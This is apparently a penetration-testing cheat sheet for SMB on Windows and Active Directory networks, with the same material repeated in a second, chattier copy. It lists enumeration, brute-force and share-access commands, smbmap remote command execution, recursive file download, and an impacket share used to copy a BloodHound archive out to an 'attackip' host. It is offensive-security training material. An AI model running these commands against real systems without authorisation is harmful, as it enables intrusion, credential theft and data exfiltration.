SMB (Server Message Block) Pentesting
Last modified: 2022-12-21 Active Directory Windows
It allows clients, like workstations, to communicate with a server like a share directory. Samba is derived from SMB for linux. Default ports are 139, 445. Enumeration
To enumerate automatically, you can use nmap.
nmap --script smb-brute -p 445 <target-ip> nmap --script smb-enum-shares.nse,smb-enum-users.nse -p 445 <target-ip> nmap --script smb-enum* -p 445 <target-ip> nmap --script smb-protocols -p 445 <target-ip> nmap --script smb-vuln* -p 445 <target-ip>
Enum4linux
Enum4linux enumerates the users, share directories, etc.
- Basic
enum4linux <target-ip>
- All enumeration
enum4linux -a <target-ip>
- Verbose
enum4linux -v <target-ip>
- Specify username and password
enum4linux -u username -p password <target-ip>
Smbmap
smbmap -H <target-ip>
- Recursive
smbmap -H <target-ip> -R
- Username and password
smbmap -u username -p password -H <target-ip>
- Execute a command
smbmap -u username -p password -H <target-ip> -x 'ipconfig'
Brute Force Credentials
hydra -l username -P passwords.txt <target-ip> smb hydra -L usernames.txt -p password <target-ip> smb
Connect
You can use smbclient to connect the target.
smbclient -L 10.0.0.1 smbclient -N -L 10.0.0.1 smbclient -N -L \\\\10.0.0.1 smbclient -L 10.0.0.1 -U username
- anonymous
smbclient //10.0.0.1/somedir -N
- with space use the "" double quotes
smbclient "//10.0.0.1/some dir" -N
- Specify shared directory
smbclient //10.0.0.1/somedir -U username
- nobody, no-pass
smbclient //10.0.0.1/somedir -N -U nobody
- Specify workgroup
smbclient -L 10.0.0.1 -W WORKGROUP -U username
Commands in SMB
After connecting, you can find the sensitive files or information.
- List files
smb> ls
- Download a file
smb> get sample.txt
To download files recursively, run the following commands.
smb> mask "" smb> recurse ON smb> prompt OFF smb> mget *
Or using smbget from local machine.
smbget -R smb://<target-ip>/somedir -U username
- Specify workgroup
smbget -R smb://<target-ip>/somedir -w WORKGROUP -U username
- as anonymous user
smbget smb://<target-ip>/somedir -U anonymous password: anonymous
transfer a file from windows to my attacker machine.
In my kali machine
mk dir smb
sudo impacket-smbserver -smb2support share $(pwd)
powershell copy bloodhound.zip \\attackip\share\
18.4.11.A. SMB Pentesting
SMB stands for Server Message Block. Default ports are 445, 139. Ok what does it do? Glad you asked. It allows clients, like workstations, to communicate with a server like a share directory. SMB Enumeration Auto enum can be done with nmap like so. Pay attention here the port may be different but no all the time and of course the ip will be different.
nmap --script smb-brute -p 445 <target-ip> nmap --script smb-enum-shares.nse,smb-enum-users.nse -p 445 <target-ip> nmap --script smb-enum* -p 445 <target-ip> nmap --script smb-protocols -p 445 <target-ip> nmap --script smb-vuln* -p 445 <target-ip> Enum4Linux enumerates the users, share directories, etc. enum4linux <target-ip> # Basic use. enum4linux -a <target-ip> # All Enum. enum4linux -v <target-ip> # Verbose. enum4linux -u username -p password <target-ip> #Specify username and password this can get us even more information as we will have accessed that users share. Smbmap smbmap -H <target-ip> smbmap -H <target-ip> -R # Recursive lookup. smbmap -u username -p password -H <target-ip> # Username and Password smbmap -u username -p password -H <target-ip> -x 'ipconfig' # Execute a command
Brute Force Credentials hydra -l username -P passwords.txt <target-ip> smb hydra -L usernames.txt -p password <target-ip> smb
Connect with smbclient smbclient -L 10.0.0.1 smbclient -N -L 10.0.0.1 smbclient -N -L \\\\10.0.0.1 smbclient -L 10.0.0.1 -U username Anonymous smbclient //10.0.0.1/somedir -N With a space in the dir we “” smbclient "//10.0.0.1/some dir" -N Specify shared directory smbclient //10.0.0.1/somedir -U username Specify workgroup smbclient -L 10.0.0.1 -W WORKGROUP -U username
Commands in SMB
Once Connected we can find sensitive files or information and we love that as hackers dont we.
List Files smb> ls
Download a file smb> get sample.txt
Put a file can be txt,pdf,php ect.. smb> put sample.txt
Download files recursively smb> mask "" smb> recurse ON smb> prompt OFF smb> mget *
We can use smbget from our local machine as well smbget -R smb://<target-ip>/somedir -U username
Specify workgroup
smbget -R smb://<target-ip>/somedir -w WORKGROUP -U username
as anonymous user
smbget smb://<target-ip>/somedir -U anonymous password: anonymous
Transfer a file from windows to my attacker machine In your local kali make a directory that you want that file to go into. mk dir smb Next we will run impacket-smbserver sudo impacket-smbserver -smb2support share $(pwd) Then we will transfer the file over to that share we just set up with impacket-smbserver. powershell copy bloodhound.zip \\attackip\share\
I choose to show you a transfer of a bloodhound zip file which is super important when enumerating AD.